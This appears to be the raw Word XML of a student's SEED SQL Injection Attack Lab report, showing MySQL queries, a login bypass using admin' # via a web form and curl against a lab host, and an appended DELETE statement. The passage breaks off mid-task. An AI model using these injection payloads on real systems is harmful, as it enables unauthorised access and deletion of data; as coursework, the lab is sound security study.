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18E9E1A3" w:rsidR="0033000D" w:rsidRPr="001369CB" w:rsidRDefault="007E5DBC" w:rsidP="00723699">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="006958BB" w:rsidRPr="006958BB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E06809" w14:textId="0AE77DBF" w:rsidR="00E43DFC" w:rsidRDefault="00730519" w:rsidP="008037F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00730519">
        <w:t>Task 1: Get Familiar with SQL Statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCFAC46" w14:textId="5E83CF57" w:rsidR="005307F0" w:rsidRDefault="007F155B" w:rsidP="005307F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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mysql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 xml:space="preserve"> -u root -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pseedubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01B62CED" w14:textId="130E1DF9" w:rsidR="007F155B" w:rsidRDefault="007F155B" w:rsidP="005307F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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mysql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&gt; use Users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA099D3" w14:textId="31456407" w:rsidR="002C7AE6" w:rsidRDefault="002C7AE6" w:rsidP="005307F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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mysql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&gt; show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B20C2" w14:textId="71AB2F82" w:rsidR="00EB166B" w:rsidRDefault="00EB166B" w:rsidP="005307F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B2CA5A" wp14:editId="54500D35">
            <wp:extent cx="5274310" cy="3283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C85" w14:textId="42AC53C9" w:rsidR="00444A5C" w:rsidRDefault="00444A5C" w:rsidP="005307F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o show all </w:t>
      </w:r>
      <w:r w:rsidR="004B07E3">
        <w:t>information about</w:t>
      </w:r>
      <w:r w:rsidR="00FE423C">
        <w:t xml:space="preserve"> Alice, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68171A50" w14:textId="1E3E67FF" w:rsidR="00FE423C" w:rsidRDefault="00437E21" w:rsidP="005307F0">
      <w:r w:rsidRPr="00437E21">
        <w:t>select * from credential where Name='Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B28557C" w14:textId="2730EFF1" w:rsidR="00437E21" w:rsidRDefault="00437E21" w:rsidP="005307F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="306B65EA" wp14:editId="1F32EA61">
            <wp:extent cx="5274310" cy="576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BD0E" w14:textId="77777777" w:rsidR="00055358" w:rsidRPr="005307F0" w:rsidRDefault="00055358" w:rsidP="005307F0"/>
    <w:p w14:paraId="230FB32D" w14:textId="33D55E52" w:rsidR="003F4640" w:rsidRDefault="00DF1355" w:rsidP="003163E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF1355">
        <w:t>Task 2: SQL Injection Attack on SELECT Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B904788" w14:textId="0BE78275" w:rsidR="006E43A4" w:rsidRPr="003163E4" w:rsidRDefault="006E43A4" w:rsidP="003163E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003163E4">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:b/>
        </w:rPr>
        <w:t>Task 2.1: SQL Injection Attack from webpage</w:t>
      </w:r>
      <w:r w:rsidRPr="003163E4">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8469EA" w14:textId="15AD7737" w:rsidR="00C0394A" w:rsidRDefault="003163E4" w:rsidP="003163E4">
      <w:r>
        <w:t>From the line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9037D" w14:textId="1A9F158D" w:rsidR="003163E4" w:rsidRDefault="003163E4" w:rsidP="003163E4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WHERE name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= ’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$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input_uname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’ and Password=’$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hashed_pwd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’";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32173C69" w14:textId="48BF20F4" w:rsidR="003163E4" w:rsidRDefault="003163E4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We can design the </w:t>
      </w:r>
      <w:r w:rsidR="000805AE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>format to make the variable name= admin and the condition is true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760181E" w14:textId="0BF4F0D6" w:rsidR="000805AE" w:rsidRDefault="000805AE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For user, simply use </w:t>
      </w:r>
      <w:r w:rsidR="000E3276" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin' #</w:t>
      </w:r>
      <w:r w:rsidR="00AE5B36">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE5B36">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE5B36">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the condition changes to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420B1BE" w14:textId="45EF954A" w:rsidR="00AE5B36" w:rsidRDefault="00AE5B36" w:rsidP="00AE5B36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WHERE name= ’</w:t>
      </w:r>
      <w:r w:rsidR="00630E18">
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin’#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’ and Password=’$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hashed_pwd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’";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB851B" w14:textId="29073F4F" w:rsidR="00AE5B36" w:rsidRDefault="00101EA8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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ype in </w:t>
      </w:r>
      <w:r w:rsidR="009E174E" w:rsidRPr="009E174E">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin' #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E71E6" w14:textId="34F7CAC7" w:rsidR="00101EA8" w:rsidRDefault="000E3276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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FE7CCBC" wp14:editId="7254A982">
            <wp:extent cx="2580342" cy="151695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893" cy="15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F329" w14:textId="1FAD85B7" w:rsidR="00855CB7" w:rsidRDefault="00855CB7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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B13292" wp14:editId="74814E80">
            <wp:extent cx="2788219" cy="1453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977" cy="14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8D6D" w14:textId="7301D7FE" w:rsidR="00855CB7" w:rsidRPr="00AE5B36" w:rsidRDefault="00122A34" w:rsidP="003F4640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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eeing this page, we can see that the task succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394FB4E1" w14:textId="1869EB8A" w:rsidR="008B6E14" w:rsidRDefault="008B6E14" w:rsidP="003163E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Task 2.2: SQL Injection Attack from command line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DDB49" w14:textId="3DBCC680" w:rsidR="00122A34" w:rsidRDefault="00122A34" w:rsidP="00122A34">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">irstly, test the original input to see what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">does the </w:t>
      </w:r>
      <w:r w:rsidR="00C9043D">
        <w:t>incorrect account page looks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C9043D">
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17F54B" w14:textId="7B6CAD49" w:rsidR="00C9043D" w:rsidRPr="00122A34" w:rsidRDefault="009E6578" w:rsidP="00122A34">
      <w:r w:rsidRPr="009E6578">
        <w:t>curl 'www.SeedLabSQLInjection.com/unsafe_home.php?username=ad&amp;Password='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F925797" w14:textId="3048992C" w:rsidR="00122A34" w:rsidRPr="00122A34" w:rsidRDefault="00155F3A" w:rsidP="00122A34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C29070C" wp14:editId="45019D56">
            <wp:extent cx="2821664" cy="2156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623" cy="21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FDB9" w14:textId="56CCC7A6" w:rsidR="00061C04" w:rsidRDefault="00C9043D" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Then, modify the command, using the username in the last task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091403E0" w14:textId="7B77DBC2" w:rsidR="004721FB" w:rsidRDefault="004721FB" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(%23 is #)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CD796" w14:textId="611ED919" w:rsidR="00CE7BC4" w:rsidRDefault="00FF51B4" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r w:rsidR="000F2610" w:rsidRPr="000F2610">
        <w:t>'www.SeedLabSQLInjection.com/unsafe_home.php?username=admin%27%20%23&amp;Password='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B8E83" w14:textId="77777777" w:rsidR="00FF51B4" w:rsidRDefault="00FF51B4" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623BB7E2" w14:textId="3457881B" w:rsidR="00757C63" w:rsidRDefault="00FF51B4" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D0D33F3" wp14:editId="68ADEDA7">
            <wp:extent cx="5274310" cy="1558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4034" w14:textId="046C039E" w:rsidR="00E63B3C" w:rsidRDefault="00E63B3C" w:rsidP="008037F6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we can see, </w:t>
      </w:r>
      <w:r w:rsidR="00FF51B4">
        <w:t xml:space="preserve">except for the same html headers, we get the </w:t>
      </w:r>
      <w:r w:rsidR="00A932F1">
        <w:t>account sheet as well. This means that we login to the SQL injection page as admin successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED38390" w14:textId="4BBB34C9" w:rsidR="003F3CEC" w:rsidRDefault="003F3CEC" w:rsidP="003F3CEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Task 2.3: Append a new SQL statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4D55D" w14:textId="3C779647" w:rsidR="003F3CEC" w:rsidRDefault="00B72490" w:rsidP="003F3CEC">
      <w:r>
        <w:t xml:space="preserve">As well, we can insert SQL statements between the username and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>comm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mark“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCFFE7" w14:textId="5583A1E9" w:rsidR="00B72490" w:rsidRDefault="002B3711" w:rsidP="003F3CEC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admin'</w:t>
      </w:r>
      <w:r w:rsidR="004721FB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D01539">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidR="004721FB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D01539">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM </w:t>
      </w:r>
      <w:r w:rsidR="004721FB" w:rsidRPr="004721FB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">credential </w:t>
      </w:r>
      <w:r w:rsidR="00D01539">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidR="004721FB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> name=</w:t>
      </w:r>
      <w:r w:rsidR="00D66002">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004721FB" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00394119">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ted</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004721FB" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004721FB" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E74814" w14:textId="092D9A8E" w:rsidR="00413B7C" w:rsidRDefault="00413B7C" w:rsidP="003F3CEC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After adding the above </w:t>
      </w:r>
      <w:r w:rsidR="00F078F5">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">message to the username, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0A1A">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC0A1A">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instruction looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EE545" w14:textId="77777777" w:rsidR="00DC0A1A" w:rsidRDefault="00DC0A1A" w:rsidP="003F3CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEF4913" w14:textId="77777777" w:rsidR="009B2206" w:rsidRDefault="009B2206" w:rsidP="009B2206">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/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 xml:space="preserve">SELECT id, name, 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eid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 xml:space="preserve">, salary, birth, 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ssn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, address, email,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3483A" w14:textId="77777777" w:rsidR="009B2206" w:rsidRDefault="009B2206" w:rsidP="009B2206">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/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nickname, Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86A951" w14:textId="77777777" w:rsidR="009B2206" w:rsidRDefault="009B2206" w:rsidP="009B2206">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/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FROM credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAFCD0" w14:textId="3231B36A" w:rsidR="00085847" w:rsidRDefault="009B2206" w:rsidP="00085847">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9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WHERE name= ’</w:t>
      </w:r>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'; delete from </w:t>
      </w:r>
      <w:r w:rsidR="00085847" w:rsidRPr="004721FB">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">credential </w:t>
      </w:r>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>where name=</w:t>
      </w:r>
      <w:r w:rsidR="00085847" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ted</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00085847" w:rsidRPr="000E3276">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00085847">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00085847" w:rsidRPr="000E3276">
        <w:rPr>
